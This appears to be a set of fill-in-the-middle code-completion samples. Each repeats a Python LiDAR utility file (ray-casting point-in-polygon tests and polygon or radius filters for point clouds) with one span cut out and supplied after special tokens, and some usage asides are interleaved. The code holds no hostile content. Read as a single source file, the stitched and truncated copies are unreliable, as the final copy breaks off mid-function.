pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
x,y,inside = points_in_radius(in_pts[:,0],in_pts[:,1],target_xy[0],target_xy[1],radius)
pts = in_pts[inside,:]
else:
print( "\t\t\t no points in neighbourhood")
return pts
<|fim▁end|> | n = len(poly)
inside = False
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y = poly[i % n]
if y > min(p1y,p2y):
if y <= max(p1y,p2y):
if x <= max(p1x,p2x):
if p1y != p2y:
xints = (y-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x == p2x or x <= xints:
inside = not inside
p1x,p1y = p2x,p2y
return inside |
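# Aside: a minimal usage sketch for the ray-casting test completed above,
# assuming a simple unit-square polygon given as (x, y) pairs.
unit_square = [(0.0, 0.0), (1.0, 0.0), (1.0, 1.0), (0.0, 1.0)]
print(point_in_poly(0.5, 0.5, unit_square))  # True  -> point lies inside
print(point_in_poly(1.5, 0.5, unit_square))  # False -> point lies outside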
<|file_name|>LiDAR_tools.py<|end_file_name|><|fim▁begin|>import numpy as np
import laspy as las
# Determine if a point is inside a given polygon or not
# Polygon is a list of (x,y) pairs. This function
# returns True or False. The algorithm is called
# the "Ray Casting Method".
# the point_in_poly algorithm was found here:
# http://geospatialpython.com/2011/01/point-in-polygon.html
def point_in_poly(x,y,poly):
n = len(poly)
inside = False
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y = poly[i % n]
if y > min(p1y,p2y):
if y <= max(p1y,p2y):
if x <= max(p1x,p2x):
if p1y != p2y:
xints = (y-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x == p2x or x <= xints:
inside = not inside
p1x,p1y = p2x,p2y
return inside
# This one is my own version of the ray-trace algorithm which utilises the numpy arrays so that a list of x and y coordinates can be processed in one call and only points inside polygon are returned alongside the indices in case required for future referencing. This saves a fair bit of looping.
def points_in_poly(x,y,poly):
<|fim_middle|>
# This retrieves all points within a circular neighbourhood. Target point is the location around which the neighbourhood search is conducted, for a specified search radius. x and y are vectors with the x and y coordinates of the test points
def points_in_radius(x,y,target_x, target_y,radius):
inside=np.zeros(x.size,dtype=bool)
d2=(x-target_x)**2+(y-target_y)**2
inside = d2<=radius**2
return x[inside],y[inside], inside
# filter lidar with polygon
# This function has been updated to include an option to filter by first return location.
# The reason for this is so full collections of returns associated with each LiDAR pulse
# can be retrieved, which can be an issue at edges in multi-return analyses
def filter_lidar_data_by_polygon(in_pts,polygon,filter_by_first_return_location = False):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
if filter_by_first_return_location:
# find first returns
mask = in_pts[:,3]==1
x_temp, y_temp, inside_temp = points_in_poly(in_pts[mask,0],in_pts[mask,1],polygon)
shots = np.unique(in_pts[mask,6][inside_temp]) # index 6 refers to GPS time
inside = np.in1d(in_pts[:,6],shots) # this function retrieves all points corresponding to this GPS time
x = in_pts[inside,0]
y = in_pts[inside,1]
x_temp=None
y_temp=None
inside_temp=None
else:
x,y,inside = points_in_poly(in_pts[:,0],in_pts[:,1],polygon)
pts = in_pts[inside,:]
else:
print("\t\t\t no points in polygon")
return pts
# filter lidar by circular neighbourhood
def filter_lidar_data_by_neighbourhood(in_pts,target_xy,radius):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
x,y,inside = points_in_radius(in_pts[:,0],in_pts[:,1],target_xy[0],target_xy[1],radius)
pts = in_pts[inside,:]
else:
print( "\t\t\t no points in neighbourhood")
return pts
<|fim▁end|> | n = len(poly)
inside=np.zeros(x.size,dtype=bool)
xints=np.zeros(x.size)
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y=poly[i % n]
if p1y!=p2y:
xints[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = (y[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)]-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x==p2x:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)])
else:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)])
p1x,p1y = p2x,p2y
return x[inside],y[inside], inside |
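# Aside: the vectorised variant completed above can test many points per call;
# a small sketch with made-up coordinates. It returns the inside x values, the
# inside y values, and the full boolean mask for later indexing.
xs = np.array([0.5, 1.5, 0.25])
ys = np.array([0.5, 0.5, 0.75])
square = [(0.0, 0.0), (1.0, 0.0), (1.0, 1.0), (0.0, 1.0)]
x_in, y_in, mask = points_in_poly(xs, ys, square)
# mask == array([ True, False,  True]); x_in and y_in hold only the inside points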
<|file_name|>LiDAR_tools.py<|end_file_name|><|fim▁begin|>import numpy as np
import laspy as las
# Determine if a point is inside a given polygon or not
# Polygon is a list of (x,y) pairs. This function
# returns True or False. The algorithm is called
# the "Ray Casting Method".
# the point_in_poly algorithm was found here:
# http://geospatialpython.com/2011/01/point-in-polygon.html
def point_in_poly(x,y,poly):
n = len(poly)
inside = False
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y = poly[i % n]
if y > min(p1y,p2y):
if y <= max(p1y,p2y):
if x <= max(p1x,p2x):
if p1y != p2y:
xints = (y-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x == p2x or x <= xints:
inside = not inside
p1x,p1y = p2x,p2y
return inside
# This one is my own version of the ray-trace algorithm which utilises the numpy arrays so that a list of x and y coordinates can be processed in one call and only points inside polygon are returned alongside the indices in case required for future referencing. This saves a fair bit of looping.
def points_in_poly(x,y,poly):
n = len(poly)
inside=np.zeros(x.size,dtype=bool)
xints=np.zeros(x.size)
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y=poly[i % n]
if p1y!=p2y:
xints[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = (y[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)]-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x==p2x:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)])
else:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)])
p1x,p1y = p2x,p2y
return x[inside],y[inside], inside
# This retrieves all points within a circular neighbourhood. Target point is the location around which the neighbourhood search is conducted, for a specified search radius. x and y are vectors with the x and y coordinates of the test points
def points_in_radius(x,y,target_x, target_y,radius):
<|fim_middle|>
# filter lidar with polygon
# This function has been updated to include an option to filter by first return location.
# The reason for this is so full collections of returns associated with each LiDAR pulse
# can be retrieved, which can be an issue at edges in multi-return analyses
def filter_lidar_data_by_polygon(in_pts,polygon,filter_by_first_return_location = False):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
if filter_by_first_return_location:
# find first returns
mask = in_pts[:,3]==1
x_temp, y_temp, inside_temp = points_in_poly(in_pts[mask,0],in_pts[mask,1],polygon)
shots = np.unique(in_pts[mask,6][inside_temp]) # index 6 refers to GPS time
inside = np.in1d(in_pts[:,6],shots) # this function retrieves all points corresponding to this GPS time
x = in_pts[inside,0]
y = in_pts[inside,1]
x_temp=None
y_temp=None
inside_temp=None
else:
x,y,inside = points_in_poly(in_pts[:,0],in_pts[:,1],polygon)
pts = in_pts[inside,:]
else:
print("\t\t\t no points in polygon")
return pts
# filter lidar by circular neighbourhood
def filter_lidar_data_by_neighbourhood(in_pts,target_xy,radius):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
x,y,inside = points_in_radius(in_pts[:,0],in_pts[:,1],target_xy[0],target_xy[1],radius)
pts = in_pts[inside,:]
else:
print( "\t\t\t no points in neighbourhood")
return pts
<|fim▁end|> | inside=np.zeros(x.size,dtype=bool)
d2=(x-target_x)**2+(y-target_y)**2
inside = d2<=radius**2
return x[inside],y[inside], inside |
<|file_name|>LiDAR_tools.py<|end_file_name|><|fim▁begin|>import numpy as np
import laspy as las
# Determine if a point is inside a given polygon or not
# Polygon is a list of (x,y) pairs. This function
# returns True or False. The algorithm is called
# the "Ray Casting Method".
# the point_in_poly algorithm was found here:
# http://geospatialpython.com/2011/01/point-in-polygon.html
def point_in_poly(x,y,poly):
n = len(poly)
inside = False
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y = poly[i % n]
if y > min(p1y,p2y):
if y <= max(p1y,p2y):
if x <= max(p1x,p2x):
if p1y != p2y:
xints = (y-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x == p2x or x <= xints:
inside = not inside
p1x,p1y = p2x,p2y
return inside
# This one is my own version of the ray-trace algorithm which utilises the numpy arrays so that a list of x and y coordinates can be processed in one call and only points inside polygon are returned alongside the indices in case required for future referencing. This saves a fair bit of looping.
def points_in_poly(x,y,poly):
n = len(poly)
inside=np.zeros(x.size,dtype=bool)
xints=np.zeros(x.size)
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y=poly[i % n]
if p1y!=p2y:
xints[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = (y[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)]-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x==p2x:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)])
else:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)])
p1x,p1y = p2x,p2y
return x[inside],y[inside], inside
# This retrieves all points within a circular neighbourhood. Target point is the location around which the neighbourhood search is conducted, for a specified search radius. x and y are vectors with the x and y coordinates of the test points
def points_in_radius(x,y,target_x, target_y,radius):
inside=np.zeros(x.size,dtype=bool)
d2=(x-target_x)**2+(y-target_y)**2
inside = d2<=radius**2
return x[inside],y[inside], inside
# filter lidar with polygon
# This function has been updated to include an option to filter by first return location.
# The reason for this is so full collections of returns associated with each LiDAR pulse
# can be retrieved, which can be an issue at edges in multi-return analyses
def filter_lidar_data_by_polygon(in_pts,polygon,filter_by_first_return_location = False):
<|fim_middle|>
# filter lidar by circular neighbourhood
def filter_lidar_data_by_neighbourhood(in_pts,target_xy,radius):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
x,y,inside = points_in_radius(in_pts[:,0],in_pts[:,1],target_xy[0],target_xy[1],radius)
pts = in_pts[inside,:]
else:
print( "\t\t\t no points in neighbourhood")
return pts
<|fim▁end|> | pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
if filter_by_first_return_location:
# find first returns
mask = in_pts[:,3]==1
x_temp, y_temp, inside_temp = points_in_poly(in_pts[mask,0],in_pts[mask,1],polygon)
shots = np.unique(in_pts[mask,6][inside_temp]) # index 6 refers to GPS time
inside = np.in1d(in_pts[:,6],shots) # this function retrieves all points corresponding to this GPS time
x = in_pts[inside,0]
y = in_pts[inside,1]
x_temp=None
y_temp=None
inside_temp=None
else:
x,y,inside = points_in_poly(in_pts[:,0],in_pts[:,1],polygon)
pts = in_pts[inside,:]
else:
print("\t\t\t no points in polygon")
return pts |
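# Aside: an illustrative call sketch for the polygon filter completed above, on a
# tiny synthetic array. The column layout is an assumption taken from the comments
# in the function itself: column 0 = x, 1 = y, 3 = return number, 6 = GPS time;
# the remaining columns are arbitrary placeholders.
demo_pts = np.array([
    [0.5, 0.5, 10.0, 1.0, 0.0, 0.0, 100.0],   # first return inside the square
    [0.6, 0.6,  8.0, 2.0, 0.0, 0.0, 100.0],   # later return of the same pulse
    [5.0, 5.0, 12.0, 1.0, 0.0, 0.0, 101.0],   # pulse entirely outside
])
square = [(0.0, 0.0), (1.0, 0.0), (1.0, 1.0), (0.0, 1.0)]
print(filter_lidar_data_by_polygon(demo_pts, square).shape)        # (2, 7)
print(filter_lidar_data_by_polygon(demo_pts, square, True).shape)  # (2, 7) - keeps whole pulses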
<|file_name|>LiDAR_tools.py<|end_file_name|><|fim▁begin|>import numpy as np
import laspy as las
# Determine if a point is inside a given polygon or not
# Polygon is a list of (x,y) pairs. This function
# returns True or False. The algorithm is called
# the "Ray Casting Method".
# the point_in_poly algorithm was found here:
# http://geospatialpython.com/2011/01/point-in-polygon.html
def point_in_poly(x,y,poly):
n = len(poly)
inside = False
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y = poly[i % n]
if y > min(p1y,p2y):
if y <= max(p1y,p2y):
if x <= max(p1x,p2x):
if p1y != p2y:
xints = (y-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x == p2x or x <= xints:
inside = not inside
p1x,p1y = p2x,p2y
return inside
# This one is my own version of the ray-trace algorithm which utilises the numpy arrays so that a list of x and y coordinates can be processed in one call and only points inside polygon are returned alongside the indices in case required for future referencing. This saves a fair bit of looping.
def points_in_poly(x,y,poly):
n = len(poly)
inside=np.zeros(x.size,dtype=bool)
xints=np.zeros(x.size)
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y=poly[i % n]
if p1y!=p2y:
xints[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = (y[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)]-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x==p2x:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)])
else:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)])
p1x,p1y = p2x,p2y
return x[inside],y[inside], inside
# This retrieves all points within a circular neighbourhood. Target point is the location around which the neighbourhood search is conducted, for a specified search radius. x and y are vectors with the x and y coordinates of the test points
def points_in_radius(x,y,target_x, target_y,radius):
inside=np.zeros(x.size,dtype=bool)
d2=(x-target_x)**2+(y-target_y)**2
inside = d2<=radius**2
return x[inside],y[inside], inside
# filter lidar with polygon
# This function has been updated to include an option to filter by first return location.
# The reason for this is so full collections of returns associated with each LiDAR pulse
# can be retrieved, which can be an issue at edges in multi-return analyses
def filter_lidar_data_by_polygon(in_pts,polygon,filter_by_first_return_location = False):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
if filter_by_first_return_location:
# find first returns
mask = in_pts[:,3]==1
x_temp, y_temp, inside_temp = points_in_poly(in_pts[mask,0],in_pts[mask,1],polygon)
shots = np.unique(in_pts[mask,6][inside_temp]) # index 6 refers to GPS time
inside = np.in1d(in_pts[:,6],shots) # this function retrieves all points corresponding to this GPS time
x = in_pts[inside,0]
y = in_pts[inside,1]
x_temp=None
y_temp=None
inside_temp=None
else:
x,y,inside = points_in_poly(in_pts[:,0],in_pts[:,1],polygon)
pts = in_pts[inside,:]
else:
print("\t\t\t no points in polygon")
return pts
# filter lidar by circular neighbourhood
def filter_lidar_data_by_neighbourhood(in_pts,target_xy,radius):
<|fim_middle|>
<|fim▁end|> | pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
x,y,inside = points_in_radius(in_pts[:,0],in_pts[:,1],target_xy[0],target_xy[1],radius)
pts = in_pts[inside,:]
else:
print( "\t\t\t no points in neighbourhood")
return pts |
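# Aside: a matching sketch for the circular-neighbourhood filter completed above.
# Only columns 0 (x) and 1 (y) matter for the distance test; the third column is
# a placeholder.
demo_xy = np.array([[0.2, 0.2, 1.0],
                    [3.0, 3.0, 2.0]])
near = filter_lidar_data_by_neighbourhood(demo_xy, (0.0, 0.0), 1.0)
# keeps only the first row, since 0.2**2 + 0.2**2 = 0.08 <= 1.0**2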
<|file_name|>LiDAR_tools.py<|end_file_name|><|fim▁begin|>import numpy as np
import laspy as las
# Determine if a point is inside a given polygon or not
# Polygon is a list of (x,y) pairs. This function
# returns True or False. The algorithm is called
# the "Ray Casting Method".
# the point_in_poly algorithm was found here:
# http://geospatialpython.com/2011/01/point-in-polygon.html
def point_in_poly(x,y,poly):
n = len(poly)
inside = False
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y = poly[i % n]
if y > min(p1y,p2y):
<|fim_middle|>
p1x,p1y = p2x,p2y
return inside
# This one is my own version of the ray-trace algorithm which utilises the numpy arrays so that a list of x and y coordinates can be processed in one call and only points inside polygon are returned alongside the indices in case required for future referencing. This saves a fair bit of looping.
def points_in_poly(x,y,poly):
n = len(poly)
inside=np.zeros(x.size,dtype=bool)
xints=np.zeros(x.size)
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y=poly[i % n]
if p1y!=p2y:
xints[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = (y[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)]-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x==p2x:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)])
else:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)])
p1x,p1y = p2x,p2y
return x[inside],y[inside], inside
# This retrieves all points within a circular neighbourhood. Target point is the location around which the neighbourhood search is conducted, for a specified search radius. x and y are vectors with the x and y coordinates of the test points
def points_in_radius(x,y,target_x, target_y,radius):
inside=np.zeros(x.size,dtype=bool)
d2=(x-target_x)**2+(y-target_y)**2
inside = d2<=radius**2
return x[inside],y[inside], inside
# filter lidar with polygon
# This function has been updated to include an option to filter by first return location.
# The reason for this is so full collections of returns associated with each LiDAR pulse
# can be retrieved, which can be an issue at edges in multi-return analyses
def filter_lidar_data_by_polygon(in_pts,polygon,filter_by_first_return_location = False):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
if filter_by_first_return_location:
# find first returns
mask = in_pts[:,3]==1
x_temp, y_temp, inside_temp = points_in_poly(in_pts[mask,0],in_pts[mask,1],polygon)
shots = np.unique(in_pts[mask,6][inside_temp]) # index 6 refers to GPS time
inside = np.in1d(in_pts[:,6],shots) # this function retrieves all points corresponding to this GPS time
x = in_pts[inside,0]
y = in_pts[inside,1]
x_temp=None
y_temp=None
inside_temp=None
else:
x,y,inside = points_in_poly(in_pts[:,0],in_pts[:,1],polygon)
pts = in_pts[inside,:]
else:
print("\t\t\t no points in polygon")
return pts
# filter lidar by circular neighbourhood
def filter_lidar_data_by_neighbourhood(in_pts,target_xy,radius):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
x,y,inside = points_in_radius(in_pts[:,0],in_pts[:,1],target_xy[0],target_xy[1],radius)
pts = in_pts[inside,:]
else:
print( "\t\t\t no points in neighbourhood")
return pts
<|fim▁end|> | if y <= max(p1y,p2y):
if x <= max(p1x,p2x):
if p1y != p2y:
xints = (y-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x == p2x or x <= xints:
inside = not inside |
<|file_name|>LiDAR_tools.py<|end_file_name|><|fim▁begin|>import numpy as np
import laspy as las
# Determine if a point is inside a given polygon or not
# Polygon is a list of (x,y) pairs. This function
# returns True or False. The algorithm is called
# the "Ray Casting Method".
# the point_in_poly algorithm was found here:
# http://geospatialpython.com/2011/01/point-in-polygon.html
def point_in_poly(x,y,poly):
n = len(poly)
inside = False
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y = poly[i % n]
if y > min(p1y,p2y):
if y <= max(p1y,p2y):
<|fim_middle|>
p1x,p1y = p2x,p2y
return inside
# This one is my own version of the ray-trace algorithm which utilises the numpy arrays so that a list of x and y coordinates can be processed in one call and only points inside polygon are returned alongside the indices in case required for future referencing. This saves a fair bit of looping.
def points_in_poly(x,y,poly):
n = len(poly)
inside=np.zeros(x.size,dtype=bool)
xints=np.zeros(x.size)
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y=poly[i % n]
if p1y!=p2y:
xints[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = (y[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)]-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x==p2x:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)])
else:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)])
p1x,p1y = p2x,p2y
return x[inside],y[inside], inside
# This retrieves all points within a circular neighbourhood. Target point is the location around which the neighbourhood search is conducted, for a specified search radius. x and y are vectors with the x and y coordinates of the test points
def points_in_radius(x,y,target_x, target_y,radius):
inside=np.zeros(x.size,dtype=bool)
d2=(x-target_x)**2+(y-target_y)**2
inside = d2<=radius**2
return x[inside],y[inside], inside
# filter lidar with polygon
# This function has been updated to include an option to filter by first return location.
# The reason for this is so full collections of returns associated with each LiDAR pulse
# can be retrieved, which can be an issue at edges in multi-return analyses
def filter_lidar_data_by_polygon(in_pts,polygon,filter_by_first_return_location = False):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
if filter_by_first_return_location:
# find first returns
mask = in_pts[:,3]==1
x_temp, y_temp, inside_temp = points_in_poly(in_pts[mask,0],in_pts[mask,1],polygon)
shots = np.unique(in_pts[mask,6][inside_temp]) # index 6 refers to GPS time
inside = np.in1d(in_pts[:,6],shots) # this function retrieves all points corresponding to this GPS time
x = in_pts[inside,0]
y = in_pts[inside,1]
x_temp=None
y_temp=None
inside_temp=None
else:
x,y,inside = points_in_poly(in_pts[:,0],in_pts[:,1],polygon)
pts = in_pts[inside,:]
else:
print("\t\t\t no points in polygon")
return pts
# filter lidar by circular neighbourhood
def filter_lidar_data_by_neighbourhood(in_pts,target_xy,radius):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
x,y,inside = points_in_radius(in_pts[:,0],in_pts[:,1],target_xy[0],target_xy[1],radius)
pts = in_pts[inside,:]
else:
print( "\t\t\t no points in neighbourhood")
return pts
<|fim▁end|> | if x <= max(p1x,p2x):
if p1y != p2y:
xints = (y-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x == p2x or x <= xints:
inside = not inside |
<|file_name|>LiDAR_tools.py<|end_file_name|><|fim▁begin|>import numpy as np
import laspy as las
# Determine if a point is inside a given polygon or not
# Polygon is a list of (x,y) pairs. This function
# returns True or False. The algorithm is called
# the "Ray Casting Method".
# the point_in_poly algorithm was found here:
# http://geospatialpython.com/2011/01/point-in-polygon.html
def point_in_poly(x,y,poly):
n = len(poly)
inside = False
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y = poly[i % n]
if y > min(p1y,p2y):
if y <= max(p1y,p2y):
if x <= max(p1x,p2x):
<|fim_middle|>
p1x,p1y = p2x,p2y
return inside
# This one is my own version of the ray-trace algorithm which utilises the numpy arrays so that a list of x and y coordinates can be processed in one call and only points inside polygon are returned alongside the indices in case required for future referencing. This saves a fair bit of looping.
def points_in_poly(x,y,poly):
n = len(poly)
inside=np.zeros(x.size,dtype=bool)
xints=np.zeros(x.size)
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y=poly[i % n]
if p1y!=p2y:
xints[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = (y[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)]-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x==p2x:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)])
else:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)])
p1x,p1y = p2x,p2y
return x[inside],y[inside], inside
# This retrieves all points within a circular neighbourhood. Target point is the location around which the neighbourhood search is conducted, for a specified search radius. x and y are vectors with the x and y coordinates of the test points
def points_in_radius(x,y,target_x, target_y,radius):
inside=np.zeros(x.size,dtype=bool)
d2=(x-target_x)**2+(y-target_y)**2
inside = d2<=radius**2
return x[inside],y[inside], inside
# filter lidar with polygon
# This function has been updated to include an option to filter by first return location.
# The reason for this is so full collections of returns associated with each LiDAR pulse
# can be retrieved, which can be an issue at edges in multi-return analyses
def filter_lidar_data_by_polygon(in_pts,polygon,filter_by_first_return_location = False):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
if filter_by_first_return_location:
# find first returns
mask = in_pts[:,3]==1
x_temp, y_temp, inside_temp = points_in_poly(in_pts[mask,0],in_pts[mask,1],polygon)
shots = np.unique(in_pts[mask,6][inside_temp]) # index 6 refers to GPS time
inside = np.in1d(in_pts[:,6],shots) # this function retrieves all points corresponding to this GPS time
x = in_pts[inside,0]
y = in_pts[inside,1]
x_temp=None
y_temp=None
inside_temp=None
else:
x,y,inside = points_in_poly(in_pts[:,0],in_pts[:,1],polygon)
pts = in_pts[inside,:]
else:
print("\t\t\t no points in polygon")
return pts
# filter lidar by circular neighbourhood
def filter_lidar_data_by_neighbourhood(in_pts,target_xy,radius):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
x,y,inside = points_in_radius(in_pts[:,0],in_pts[:,1],target_xy[0],target_xy[1],radius)
pts = in_pts[inside,:]
else:
print( "\t\t\t no points in neighbourhood")
return pts
<|fim▁end|> | if p1y != p2y:
xints = (y-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x == p2x or x <= xints:
inside = not inside |
<|file_name|>LiDAR_tools.py<|end_file_name|><|fim▁begin|>import numpy as np
import laspy as las
# Determine if a point is inside a given polygon or not
# Polygon is a list of (x,y) pairs. This function
# returns True or False. The algorithm is called
# the "Ray Casting Method".
# the point_in_poly algorithm was found here:
# http://geospatialpython.com/2011/01/point-in-polygon.html
def point_in_poly(x,y,poly):
n = len(poly)
inside = False
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y = poly[i % n]
if y > min(p1y,p2y):
if y <= max(p1y,p2y):
if x <= max(p1x,p2x):
if p1y != p2y:
<|fim_middle|>
if p1x == p2x or x <= xints:
inside = not inside
p1x,p1y = p2x,p2y
return inside
# This one is my own version of the ray-trace algorithm which utilises the numpy arrays so that a list of x and y coordinates can be processed in one call and only points inside polygon are returned alongside the indices in case required for future referencing. This saves a fair bit of looping.
def points_in_poly(x,y,poly):
n = len(poly)
inside=np.zeros(x.size,dtype=bool)
xints=np.zeros(x.size)
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y=poly[i % n]
if p1y!=p2y:
xints[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = (y[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)]-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x==p2x:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)])
else:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)])
p1x,p1y = p2x,p2y
return x[inside],y[inside], inside
# This retrieves all points within a circular neighbourhood. Target point is the location around which the neighbourhood search is conducted, for a specified search radius. x and y are vectors with the x and y coordinates of the test points
def points_in_radius(x,y,target_x, target_y,radius):
inside=np.zeros(x.size,dtype=bool)
d2=(x-target_x)**2+(y-target_y)**2
inside = d2<=radius**2
return x[inside],y[inside], inside
# filter lidar with polygon
# This function has been updated to include an option to filter by first return location.
# The reason for this is so full collections of returns associated with each LiDAR pulse
# can be retrieved, which can be an issue at edges in multi-return analyses
def filter_lidar_data_by_polygon(in_pts,polygon,filter_by_first_return_location = False):
pts = np.zeros((0,in_pts.shape[1]))
